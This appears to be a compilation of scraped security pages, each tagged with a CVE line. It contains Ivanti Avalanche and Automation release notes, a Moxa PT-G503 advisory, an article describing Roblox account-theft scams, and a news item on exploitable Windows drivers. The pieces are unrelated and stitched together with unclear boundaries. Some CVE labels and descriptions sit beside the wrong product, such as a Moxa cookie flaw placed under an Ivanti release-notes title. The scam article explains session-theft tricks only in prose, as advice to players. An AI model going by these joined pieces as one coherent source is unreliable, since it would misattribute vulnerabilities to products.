GCM and wildcard HTTPS certs at a higher level and have them set at lower SDS in the tree. You can then set specific settings such as the SDS public address, or check in times at a locally applied SDS profile. Device Folder Assignment setting allows the enrollment to be placed in a static folder or dynamically place based on folder selection criteria UDP Service Discovery allows the SDS to listen for enrollment broadcasts from the enabler. Central File Store These settings allow you to point to a file share. Files can be uploaded and managed via the Central File Store. You can then use these files in Android manifest URL software payloads, Android file payloads and Android OS Update payloads. Upon deployment of these payloads to an SDS the files will be cached in a file store local to the SDS. Implemented Zebra MX Extensions Now Android Agent applies StageNow config file "avamxmf.xml" placed specific location on SD card "/sdcard/Ivanti/MXMF" using MX framework. Log "MXMS configuration XML file applied successfully" will be displayed when MX config file applied. New Features and Improvements: Scalability - multiple SDS support Improved ANS reliability Distributed file caching Upgrade to Tomcat 8.5 Android device restrictions for post Kitkat devices Vendor specific enablers - Panasonic, Datalogic, Zebra GCM and ANS enabler functionality combined into single enabler Hide Google search box Zebra MX Extensions Reference (Global) enrollment rules Updated passcode payload Updated Restrictions payloads Restrict access to setting application Updated Application whitelisting Updated Application blacklisting Combined GCM and ANS enabler Device wiped if device admin is disabled Devices can broadcast to find their local Avalanche instance and enroll Set NTP server and time zone on device Ivanti Rebrand Removed: DEP Support (system settings and enrollment rule) VPP (Tools>VPP) Windows Phone 8 support (payloads, system settings) LDAP for Login and Enrollment + LDMS connection info (system settings) LDAP Enrollment (Enrollment rule) User Targeting (system settings, user tree) LD Portal (software payload deployment option, link payload deployment option) Media Payload Check for updates (Tools>Check for updates) Android Remote Control Settings (System Settings) Wavelink Remote Control Button in Inventory Page Tiny URL column on enrollment rule page Enabler: Home screen with Remote Control Server Address Enabler: About Screen Enabler: Remote Control capability Fixes: Fix: Improved data validation for java beans Fix: Manifest app installation in android client Fix: Improved functionality with self-signed certificates Fix: Deployments rolled back in large systems Fix: Devices Overwriting one another on Enroll Fix: IP Ranges in selection criteria were treated as a string and not numerically Fix: Data from other payloads sometimes displayed in a new payload

CVE-2023-41726

A locally authenticated attacker with low privileges can bypass authentication due to insecure inter-process communication.

**What's New**

Updated logo

The logo for Ivanti Automation has been updated to reflect the latest design.

**Resolved issues**

The following issues were resolved in this release:

 

Problem ID

Title

93334

Automation team based on Operating System Version Microsoft Windows 11 rule also includes Windows 10 computers.  
More information

93646

Dispatchers are stuck at random times.  
More information

93652

Building block created using 'Automation/API/BuildingBlocks/Create' is missing the Run Elevated info: <runelevated>yes</runelevated>.  
More information

94122

Runbook containing multiple projects are giving visual inconsistency.  
More information

94218

Netbios name resolve is not working anymore in task Install Windows Installer package with a resource located on fileshare (UNC).  
More information

94406

The previously used Root certificate information still resides in the Automation Agent MSI file.  
More information

Resolved an Automation Manager authentication bypass vulnerability

**Release Notes for previous versions of Ivanti Automation 2023**

Ivanti Automation 2023.3

**Resolved issues**

The following issues were resolved in this release:

 

Problem ID

Title

92405

Projects still runs in prepare for image task, regardless if the project is enabled or disabled.  
More information

92597

The File Operations task fails when wildcards are used in the path.  
More information

93108

Option grab log file in perform unattended installation task does not work in Ivanti Automation.  
More information

93464

The Install Windows Installer Package task fails after upgrade to 10.22.0.0  
More information

93850

The spelling of the word 'following' is incorrect in the pop-up that appears when deleting a team that has a task in it.  
More information

Ivanti Automation 2023.2.0.1

**Resolved issues**

The following issues were resolved in this release:

 

Problem ID

Title

93451

Runbook is not fully processed when a Project is used in the Runbook job in Ivanti Automation 2023.2.0.0  
More information

Resolved in release 2023.2(.0.0):

 

Problem ID

Title

90177

The View button for Resulting Tasks in scheduled recurring Jobs is not working.  
More information

92477

Task Install Windows Installer Package fails after upgrade to Ivanti Automation 2023.1 (10.22.0.0).  
More information

92587

After installing Ivanti Automation 2022.4: File Operations task to move folder content fails: Access to the path is denied.  
More information

92868

The Perform Unattended Installation task fails after updating Ivanti Automation.  
More information

92929

Task Apply Registry Settings using Expandable String Values adds additional backslashes in the data value.  
More information

93038

Module Conditions in a Project are not visible when viewed via the Job History.  
More information

Released in 2023.2(.0.0), but reverted:

 

Problem ID

Title

92405  
(reverted)

Projects still run in Prepare for Image task regardless if the project is enabled or disabled.  
More information  

Ivanti Automation 2023.1

**Resolved issues**

The following issues were resolved in this release:

 

Problem ID

Title

92110

The PowerShell Core (Execute) task does not show the Console Output tab in the executed job details.  
More information

92144

After editing a configured Condition based on a registry value, the following error is shown: A string literal was not closed.  
More information

91747

After an Ivanti Automation upgrade is performed, the C:\\IA\_RecycleBin folder not auto-cleaned up.  
More information

91932

The order of jobs scheduled on multiple agents is incorrect in the Activity and Job History tabs.  
More information

91976

The Query Parameters task behaves differently, causing Execute Commands tasks to fail.  
More information

91966

When the Set Environment Variables task is used, the Variable name is changed to case-sensitive.  
More information

**Release Notes for Ivanti Automation 2022**

Ivanti Automation 2022.4

**What's New**

Tracing optimizations

Starting with Ivanti Automation 2022.4, you have more control over how much disk space tracing takes up. By implementing the MaxLogFileSizeMB, FreeDiskspacePercent, and FileLogThreshold registers, you can set up the maximum amount of megabytes a trace file can take up before rewriting itself, how much space needs to be available in order for the trace entries to be written in the trace file, and control what trace levels should be written.

**Resolved issues**

The following issues were resolved in this release:

 

Problem ID

Title

91488

If the date/time information stored in the TelemetryLastSend registry key has an incorrect format, the Automation Dispatcher logs the following error in the Microsoft Windows Event Viewer: String was not recognized as a valid DateTime.  
More information

91321

Handles on agent.exe are not completely released after running Powershell tasks in Ivanti Automation.  
More information

91010

Missing Global option in the drop down menu within Topology > Teams settings in Ivanti Automation.  
More information

91513

The REST Request task fails with the following error: An error has occurred.  
More information

91138

The Deploy Automation Components task does not contain connection information when used to deploy the Ivanti Automation Console.  
More information

91477

When upgrading the Automation environment, the upgrade pack requests credentials to continue.  
More information

91079

Recurring schedule stops and is not reschedules as expected.  
More information

91362

The Apply Registry Settings task fails when the REG\_MULTI\_SZ registry entry is set with an empty Data field.  
More information

90574

When the use of Comments on Versioning is avoided when editing a Runbook, it causes the Ivanti Automation Console to freeze.  
More information

91170

Filtering the Job History in Ivanti Automation does not work since version 2022.3.  
More information

91011

The Perform Single File Operation task in Ivanti Automation does not accept \* to delete subfolders and content in subfolders.  
More information

91020

Tasks using Global Variables of type Credentials fail with the following error: 1326 The username or password is incorrect.  
More information

91212

When an Automation Resource Package is used in the Perform Unattended Installation task, the task fails with the following errors: Process failed to start or Timeout expired - Process terminated.  
More information

91476

Visual view in the Ivanti Automation Console seems not to be correct, order is not as it should be.  
More information  

Ivanti Automation 2022.3.1

**Resolved issues**

The following issues were resolved in this release:

 

Problem ID

Title

90807

When using the Download Resource task to download an Ivanti Automation Resource Package, the task fails with the following error: Failed (completely or partly) to extract 'ResourcePackage' to 'C:\\<PATH>\\DestinationFolder.  
More information

90796

Changing the Windows Defender Firewall service startup type with Ivanti Automation fails.  
More information

90753

The AutoCreate button for RunBook and Project parameters only works in combination with AutoLink.  
More information

90767

After upgrading to Ivanti Automation 2022.3, the Perform Unattended Installation task fails to download linked resources.  
More information

90736

After upgrading to Ivanti Automation 2022.3, the Perform Unattended Installation task fails if the resource is located on FileShare.  
More information

90786

After upgrading to Ivanti Automation 2022.3, the Perform Unattended Installation task fails when using an Ivanti Automation Resource Package.  
More information

Ivanti Automation 2022.3

**What's New****Resolved issues**

The following issues were resolved in this release:

 

Problem ID

Title

90055

When an automated installation using Chef tool is started, communication between the Agent and the Dispatcher fails and the resamad.xml file is not created.  
More information

90346

The Download Resource task fails when the destination path is set to C:\\.  
More information

90091

Intermittently, the Project Parameter value is cleared during Job activity.  
More information

90431

Ivanti Automation tasks with linked Resources fail with the following error: StartIndex cannot be less than zero.  
More information

90012

When an Automation Agent has a Primary Team set, the Download Resource task fails with the following error: Resource could not be downloaded in cache: <Resource.wis>. Original resource name: <FileName>.  
More information

90531

A module containing the task Perform File Operation: Action Edit/Create INI file and having the file path set to C:\\fails with the following error: Failed to rename, file or folder "C:\\placeholder.ini" does not exist.  
More information

When a string used to filter Job History or Audit Trail entries contains a single quote character ('), the filtering returns no records.  
More information

When the Automation Console is used to configure the maximum number of parallel jobs that an Agent can execute to 100, the agent will only execute 50 Jobs in parallel.  
More information

When Auto-Refresh is enabled and many entries are present, deadlocks occur in the Scheduling and Activity nodes.  
More information

When the Agent Alias feature is enabled, but no paths are configured, CheckForChanges errors are logged and no jobs are picked by the Agents.  
More information

The Evaluator is not functional for the Parameters (Query) and Microsoft System Center Configuration Manager (Query Server) tasks.  
More information

Ivanti Automation 2022.2.2

**Resolved issues**

The following issues were resolved in this release:

 

Problem ID

Title

90037

The Perform Single File Operation task fails if the destination folder does not exist.  
More information

90091

Intermittently, the Project Parameter value is cleared during Job activity.  
More information

90012

When an Automation Agent has a Primary Team set, the Download Resource task fails with the following error: Resource could not be downloaded in cache: <Resource.wis>. Original resource name: <FileName>.  
More information

90130

The exit code in an Execute Command task is always 0.  
More information

90271

The Manage Service task does not work if the service name contains a space.  
More information

The Dispatcher is not updated after upgrading the Automation environment.  
More information

An Execute Command task configured with credentials and referencing a resource file fails.  
More information  

Unicode characters are incorrectly presented in job results in the Automation Console.  
More information  

Ivanti Automation 2022.2.1

**Known issues**

The list below contains known issues for this release:

 

Problem ID

Title

90037

The Perform Single File Operation task fails if the destination folder does not exist.  
More information

90091

Intermittently, the Project Parameter value is cleared during Job activity.  
More information

90012

When an Automation Agent has a Primary Team set, the Download Resource task fails with the following error: Resource could not be downloaded in cache: <Resource.wis>. Original resource name: <FileName>.  
More information

90130

The exit code in an Execute Command task is always 0.  
More information

90271

The Manage Service task does not work if the service name contains a space.  
More information

The Dispatcher is not updated after upgrading the Automation environment.  
More information

An Execute Command task configured with credentials and referencing a resource file fails.  
More information  

Unicode characters are incorrectly presented in job results in the Automation Console.  
More information  

**Resolved issues**

The following issues were resolved in this release:

 

Problem ID

Title

89803

The Manage Service Properties task fails with the following error: Invalid access to memory location.  
More information

89821

An Execute Command task fails when Execute command using the Windows command interpreter is unchecked.  
More information

89818

The variable in the Execute Command task is case sensitive.  
More information

89819

The Copy - File/Folder action of a single file in the Perform File Operations task fails.  
More information

 

Stopping a service by using the Manage Service Properties task fails without returning an error.  
More information

Ivanti Automation 2022.2

**What's new**

Automation tasks migrated to a newer code base

For continued maintainability of the code, the following tasks have been migrated to a newer code base:

*   Files (Perform Operations);
    
*   Environment Variables (Set, Delete);
    
*   Service Properties (Manage);
    
*   Resource (Download);
    
*   Command (Execute).
    

**Known issues**

The list below contains known issues for this release:

 

Problem ID

Title

89803

The Manage Service Properties task fails with the following error: Invalid access to memory location.  
More information

89821

An Execute Command task fails when Execute command using the Windows command interpreter is unchecked.  
More information

89818

The variable in the Execute Command task is case sensitive.  
More information

89819

The Copy - File/Folder action of a single file in the Perform File Operations task fails.  
More information

 

Stopping a service by using the Manage Service Properties task fails to report the actual error message.  
More information

**Resolved issues**

The following issues were resolved in this release:

 

Problem ID

Title

89428

Automation jobs scheduled via the Dispatcher to an empty team stay in the Scheduled state indefinitely.  
More information

88869

Automation jobs are incorrectly processed on Agents installed on non-persisted machines.  
More information  

89331

After upgrading to Ivanti Automation 2021.4, the Automation Console is not responding when scheduling runbooks.  
More information  

89381

Downloading resource fails with the following error: Resource could not be downloaded in cache: <Resource.wis>. Original resource name: <FileName>.  
More information

89376

Automation Agents show an increase in memory usage while no jobs are being executed.  
More information

89406

After selecting a new Automation Module or Project in Environment Manager, the following error is shown: Unable to connect to the selected Dispatcher service.  
More information

89113

The operation of checking if the LanmanWorkstation service is running fails on non-English operating systems.  
More information

88752

When choosing the option Change settings for multiple Agents in the Automation console, the Global <value> is visible and the Team <value> is not available.  
More information

89484

When selecting the Variables node in the Ivanti Automation Console, the following error is shown: clsVariable.Load\_Internal: 13 - Type mismatch.  
More information

89216

When a condition checking a parameter has to check a value containing 5 or more digits, the following error appears when opening the task and condition: Error in sharedEncryption.fstrLegecyDecrypt: 5 - Invalid procedure call or argument.  
More information

 

The license overview now displays license points correctly when old and new license types are combined.  
More information  

Ivanti Automation 2022.1

**What's new****New team membership rules**

Automatically add Agents to Teams with new file/folder and registry key detection rules. More information.

**Service triggers**

Start and stop Windows services based on trigger events. More information.

**Interactive job execution**

Use this task to create interactive multipart jobs, where the user sees a Windows notification and can choose to continue, skip, or abort job actions. More information.

**New Automation component deployment logs**

When deploying Ivanti Automation components, the Job History has a new **Log** tab that displays the MSI installation log. This can help troubleshoot deployment issues. In **Job History > Tasks**, double-click the task you want and then click the **Log** tab.

**The database revision level remains at 83**

There was no database revision level update for this release.

**Resolved issues**

The following issues were resolved in this release:

 

Problem ID

Title

87369

Agents will not pick up jobs after recreating a global variable that is used on a Teams or Agents level.  
More information

87675

Scheduled Jobs based on a CRON expression return the following error: Please enter a valid cron expression.  
More information

87561

Opening a scheduled job results in the error: Error in clsParamters.Load: 452 This key is already associated with an element of this collection.  
More information

87739

The drop-down list for the RunbookWho parameter in a runbook contains an additional entry.  
More information

88147

Using functions in an Automation task results in the error that the task contains illegal characters.  
More information

87960

Error in modWMC.MoveListItemTop:13 Type mismatch appears when changing the order of a Runbook job.  
More information

88048

The Date/Time information in some of the columns of the Automation Console is presented with an incorrect order of the day and month.  
More information

88229

World writable permissions on the resamad.log are marked as violations by third party security scanners.  
More information

88250

Windows 10 21H2 - v2009 (19044.1348) is not detected when using as condition OS Windows 10.  
More information

88292

Using PowerCLI to manage a VMWare vCenter environment via Ivanti Automation results in the error: Could not load file or assembly 'Newtonsoft.Json'.  
More information

88341

Could not load file or assembly server error on opening Ivanti Automation Management Portal.  
More information

87107

Error during the creation of a building block: ERROR in modBuildingBlocks.FillCustomSettings: 91 - Object variable or With block variable not set.  
More information

 

The Automation Console connection registry values are changed when using Windows Authentication even though the user was not prompted to save them.  
More information

 

No error is presented when Windows Authentication is used and the impersonation is done using the logged on user instead of configured user.  
More information

 

The Automation Agent fails to auto update when the download of the new msi file takes too long.  
More information

**Release Notes for Ivanti Automation 2021 and older**

Ivanti Automation 2021 Release Notes

Ivanti Automation 2020 Release Notes

CVE-2022-44569: Ivanti Automation 2023.4 Release Notes

A vulnerability has been identified in PT-G503 Series firmware versions prior to v5.2, where the Secure attribute for sensitive cookies in HTTPS sessions is not set, which could cause the cookie to be transmitted in plaintext over an HTTP session. The vulnerability may lead to security risks, potentially exposing user session data to unauthorized access and manipulation.



As of June 15, 2022, this site no longer supports Internet Explorer. Please use another browser for the best experience on our site.

**Please sign in**

**SUMMARY**

**PT-G503 Series Multiple Vulnerabilities**

*   Security Advisory ID: MPSA-230203
*   Version: V1.0
*   Release Date: Nov 02, 2023
*   Reference:
    

PT-G503 Series firmware version v5.2 and prior are affected by multiple vulnerabilities in the old version of jQuery, weak cipher suites, and unsecure web cookies. Using the older jQuery version and weak cipher suites and not setting session cookie attributes properly caused these vulnerabilities. These vulnerabilities could put your security at risk in many ways, such as Cross-site Scripting (XSS) attacks, prototype pollution, data leaks, unauthorized access to user sessions, etc. 

  
The identified vulnerability types and potential impacts are shown below:

Item

Vulnerability Type

Impact

1

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (CWE-79) 

CVE-2015-9251, CVE-2020-11022, CVE-2020-11023 (jQuery) 

An attacker located remotely can insert HTML or JavaScript into the system via a web interface. 

2

Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') (CWE-1321) 

CVE-2019-11358 (jQuery) 

An attacker can inject attributes that are used in other components. 

3

Inadequate Encryption Strength (CWE-326) 

CVE-2005-4900 (cipher) 

An attacker may be able to decrypt the data using spoofing attacks. 

4

Sensitive Cookie Without 'HttpOnly' Flag (CWE-1004) 

CVE-2023-4217 (Cookie) 

This vulnerability could cause security risks and allow unauthorized access to user session data. 

5

Sensitive Cookie in HTTPS Session Without 'Secure' Attribute (CWE-614) 

CVE-2023-5035 (Cookie) 

This vulnerability could cause the cookie to be transmitted in plaintext over an HTTP session. 

**Vulnerability Scoring Details**

ID

CVSS V3.1

VECTOR

REMOTE EXPLOIT WITHOUT AUTH?

CVE-2005-4900 

5.9 

AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N 

Yes

CVE-2015-9251 

6.1 

AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 

Yes

CVE-2019-11358 

6.1 

AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 

Yes

CVE-2020-11022 

6.9 

AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:N 

Yes

CVE-2020-11023 

6.9 

AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:N 

Yes

CVE-2023-4217 

3.1 

AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N 

Yes

CVE-2023-5035 

3.1 

AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N 

Yes

**AFFECTED PRODUCTS AND SOLUTIONS**

**Affected Products:**

The affected products and firmware versions are shown below.

Product Series

Affected Versions

PT-G503 Series 

Firmware version 5.2 and prior. 

**Solutions:**

For CVE-2005-4900, CVE-2015-9251, CVE-2019-11358, CVE-2020-11022, and CVE-2020-11023, Moxa has developed appropriate solutions to address the vulnerabilities by updating the jQuery version and removing weak cipher suites. The solutions for affected products are shown below. 

****Mitigation****

The risk levels of CVE-2023-4217 and CVE-2023-5035 are low, and it’s hard to forbidden HTTP connections because HTTP is still required in certain legacy application scenarios. To mitigate these vulnerabilities, users should carefully use HTTP if necessary, and could try to replace HTTP by HTTPS when using the web service. Additionally, refer to the following mitigation measures to deploy the product in an appropriate product security context. 

Moxa recommends users follow CISA recommendations.  

*   Reduce network exposure by ensuring that all control system devices and systems are not accessible from the Internet. 
    
*   Place control system networks and remote devices behind firewalls, isolating them from business networks. 
    
*   When remote access is necessary, employ secure methods such as Virtual Private Networks (VPNs). It is important to note that VPNs may have vulnerabilities and should be kept up to date with the latest available version. Remember that the security of a VPN depends on the security of its connected devices. 
    

**Revision History:**

VERSION

DESCRIPTION

RELEASE DATE

1.0

First Release

Nov 2, 2023 

**Relevant Products**

PT-G503 Series ·

*     Print this page
    
*   You can manage and share your saved list in My Moxa
    

**Let’s get that fixed**

If you are concerned about a potential cybersecurity vulnerability, please contact us and one of technical support staff will get in touch with you.

Report a Vulnerability

CVE-2023-5035: PT-G503 Series Multiple Vulnerabilities

Knowing the common scams is an important step in using the platform safely. The following recommendations help players not fall into scams.

Thursday, November 2, 2023 07:11

*   Online video games often make use of in-game virtual currency and give players the ability to purchase, trade or sell items. While these features are often selling points for players and potential revenue streams for the companies that make them, they also inevitably draw bad actors and scams.
*   One of these games is “Roblox,” a highly popular gaming platform, especially among children. We curated a short list of scams that have been reported online, such as on user support forums, YouTube videos and scammer Discord channels, explaining how they work and providing advice on how to detect and avoid them.

Roblox is a gaming platform composed of “Experiences,” which is “Roblox’s” name for user-created 3-D worlds where players can interact with each other and their surroundings. The creator, which can be any user, builds the scenarios, the game logic, items and overall interactivity of the experience.

Roblox is free to play but contains an in-application currency called “Robux” that can be used to purchase clothes, weapons or other items for a user’s avatar, some of which exist in limited quantities and can be worth tens of thousands of real-world dollars. Items can also be traded for other items or Robux using a built-in trading system. This creates a potentially profitable market and even though trading for real money is prohibited by the terms of service, some users negotiate outside the platform and trade using real money.

Where there is a potential for profit there are also people trying to scam others. “Roblox” users can be targeted by scammers (known as “beamers” by “Roblox” players) who attempt to steal valuable items or Robux from other players. This can sometimes be made easier for the scammers because of “Roblox's” young user base. Nearly half of the game’s 65 million users are under the age of 13 who may not be as adept at spotting scams.

**How to identify scams**

Having knowledge of common scams and how they work is key to spotting them, even if you’ve never heard of a particular tactic before. The following are some of the most common scams that have been seen targetting “Roblox” users.

**Offering free Robux/phishing** 

The scammer sends a message using “Roblox’s” in-game chat or another messaging application, to the victim offering a way to earn free Robux. In the most common variation of this scam, the user receives a link to a web page containing “Roblox”-related themes or images. The site offers the victim free Robux and asks the victim to enter their username and password so that they can receive the Robux in their account. After inserting their username and password, instead of receiving the Robux, the scammer logs into the victim’s account and steals all Robux and valuable items.

**In-experience phishing** 

In Roblox, any user can create experiences, including scammers. In this case, the scammer creates a malicious experience that promises to deliver free Robux and prompts the victim to fill out a form with their username and password. The victim’s credentials are sent to an actor-controlled server, allowing the adversary to log in to the user’s account and steal all Robux and valuable items.

__source: https://roblox.fandom.com/wiki/Scam/Gallery?file=Reward\_scam.jpg__

**JavaScript method** 

The scammer asks the victims to copy and paste a link containing JavaScript code into the browser’s address bar. There are many variations that use this method. In one common variation, the scammer pretends to be developing an experience and asks the user to use their avatar image in the experience. To receive the details of the avatar automatically, the scammer asks the victim to copy and paste the link containing the JavaScript code into the browser’s address bar. That code then steals the victim’s session ID, allowing the scammer to use the platform to log in to the victim's account and transfer all items and Robux from the victim's account to the scammer’s account. 

**Bookmark method** 

The bookmark method is a variant of the JavaScript method. Instead of asking the victim to paste a link into the address bar, the victim is asked to drag and drop the bookmark into the bookmarks bar and then click on it. The bookmark contains JavaScript code that steals the victim’s session ID. 

source: https://www.reddit.com/r/robloxhackers/comments/11eofbr/possibly\_new\_roblox\_scam/

**API method** 

The scammer proposes a trade that is usually too good to be true to the victim. Then, the attacker says that before continuing with the trade, they would like to check if the victim’s items have not been stolen. To do this, they say, the victim must visit a special page in Roblox and insert an ID. They then give the victim the URL for a page that is actually part of the Roblox domain and contains the following form, among other things.

This page is part of the Roblox API documentation and is used by developers to test the API. While talking with the victim, the scammer creates a trade request that, if accepted, would transfer all the victim’s items to the scammer. The scammer then sends this ID to the victim and instructs him to insert the ID in the form and click “Try it out.” This will cause the user to accept a trade with the specified ID and transfer all their items and Robux to the scammer.

**HAR file method** 

The scammer offers to create a free GFX (a 3-D, realistic version of the victim’s avatar) under the pretext that they are learning to do this and could use the practice. If the victim accepts, the scammer says they need a file to complete the development and gives the victim a tutorial or video explaining how to obtain the file. The tutorial requests that the victim open their browser developer tools and save the network request as a HAR file, as shown below.

Once saved, the victim is instructed to send it to the scammer. This file contains the session ID of the victim, which allows the scammer to use the platform logged into the victim’s account and steal all items and Robux.

**Double trade** 

The scammer approaches the victim proposing two trades. One trade is good for the scammer and one is good for the victim. The victim comes out with a clear advantage from this trade. The scammer puts the condition that the victim either accepts both trades or rejects both trades. However, while they chat, the scammer removes some Robux from their account, making the trade that favors the victim fail for lack of Robux in the attacker's account. When the victim accepts both trades, only the bad trade goes through, making it a bad deal for the victim.

**Malware installation** 

This method is as simple as requesting the victim to install some software or a browser extension as a way to receive free Robux or to help the scammer perform some development that is of interest to the victim. The installed software is malware, designed to steal the victim’s session ID, which allows the scammer to use the platform logged in to the victim’s account and steal all items and Robux.

**5 ways to avoid being scammed**

Knowing the common scams is an important step in using the platform safely. The following recommendations help players not fall into scams:

*   **If it seems too good to be true, it is:** This is probably the most important recommendation. If a stranger or a website is claiming to offer free currency or free items, it is almost certainly a scam.
*   **Don't open links or download files sent by unknown sources:** These links can be phishing or malware delivery lures. If you don't know the other player, it’s generally a good idea to not open the link.
*   **Be suspicious of requests to perform unusual actions**: Some scams rely on the user performing more or less technical actions. These are a good indicator that it may be a scam. For example:
    *   Copy-pasting into the browser address bar.
    *   Creating and clicking in bookmarks.
    *   Opening browser developer tools.
*   **Be suspicious of unusual trades**: When trading some attention to some red flags, such as:
    *   Trades that are conducted outside the platform.
    *   Trades where the trader creates unusual rules such as double trades.
    *   Requests to perform actions on the web browser during a trade negotiation, such as using the API form.
*   **Use the platform’s built-in security features**: Roblox takes security seriously and provides security guides and several features to increase security. For example:
    *   Enable multi-factor authentication.
    *   Configure account privacy.
    *   Configure who, if anyone, can trade with the player.
    *   Configure the trade quality filter to help avoid suspicious trades.
    *   Enable a mandatory PIN to change settings.
    *   Exploring and using these can help better protect minors. The following links contain additional information and guidance:

https://corporate.roblox.com/parents/ 

https://en.help.roblox.com/hc/en-us/articles/203313380-Keep-Your-Account-Safe

Attackers use JavaScript URLs, API forms and more to scam users in popular online game “Roblox”

As many as 34 unique vulnerable Windows Driver Model (WDM) and Windows Driver Frameworks (WDF) drivers could be exploited by non-privileged threat actors to gain full control of the devices and execute arbitrary code on the underlying systems.
"By exploiting the drivers, an attacker without privilege may erase/alter firmware, and/or elevate [operating system] privileges," Takahiro Haruyama, a

Endpoint Security / Malware

As many as 34 unique vulnerable Windows Driver Model (WDM) and Windows Driver Frameworks (WDF) drivers could be exploited by non-privileged threat actors to gain full control of the devices and execute arbitrary code on the underlying systems.

"By exploiting the drivers, an attacker without privilege may erase/alter firmware, and/or elevate \[operating system\] privileges," Takahiro Haruyama, a senior threat researcher at VMware Carbon Black, said.

The research expands on previous studies, such as ScrewedDrivers and POPKORN that utilized symbolic execution for automating the discovery of vulnerable drivers. It specifically focuses on drivers that contain firmware access through port I/O and memory-mapped I/O.

The names of some of the vulnerable drivers include AODDriver.sys, ComputerZ.sys, dellbios.sys, GEDevDrv.sys, GtcKmdfBs.sys, IoAccess.sys, kerneld.amd64, ngiodriver.sys, nvoclock.sys, PDFWKRNL.sys (CVE-2023-20598), RadHwMgr.sys, rtif.sys, rtport.sys, stdcdrv64.sys, and TdkLib64.sys (CVE-2023-35841).

Of the 34 drivers, six allow kernel memory access that can be abused to elevate privilege and defeat security solutions. Twelve of the drivers could be exploited to subvert security mechanisms like kernel address space layout randomization (KASLR).

Seven of the drivers, including Intel's stdcdrv64.sys, can be utilized to erase firmware in the SPI flash memory, rendering the system unbootable. Intel has since issued a fix for the problem.

VMware said it also identified WDF drivers such as WDTKernel.sys and H2OFFT64.sys that are not vulnerable in terms of access control, but can be trivially weaponized by privileged threat actors to pull off what's called a Bring Your Own Vulnerable Driver (BYOVD) attack.

The technique has been employed by various adversaries, including the North Korea-linked Lazarus Group, as a way to gain elevated privileges and disable security software running on compromised endpoints so as to evade detection.

"The current scope of the APIs/instructions targeted by the \[IDAPython script for automating static code analysis of x64 vulnerable drivers\] is narrow and only limited to firmware access," Haruyama said.

"However, it is easy to extend the code to cover other attack vectors (e.g. terminating arbitrary processes)."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#ios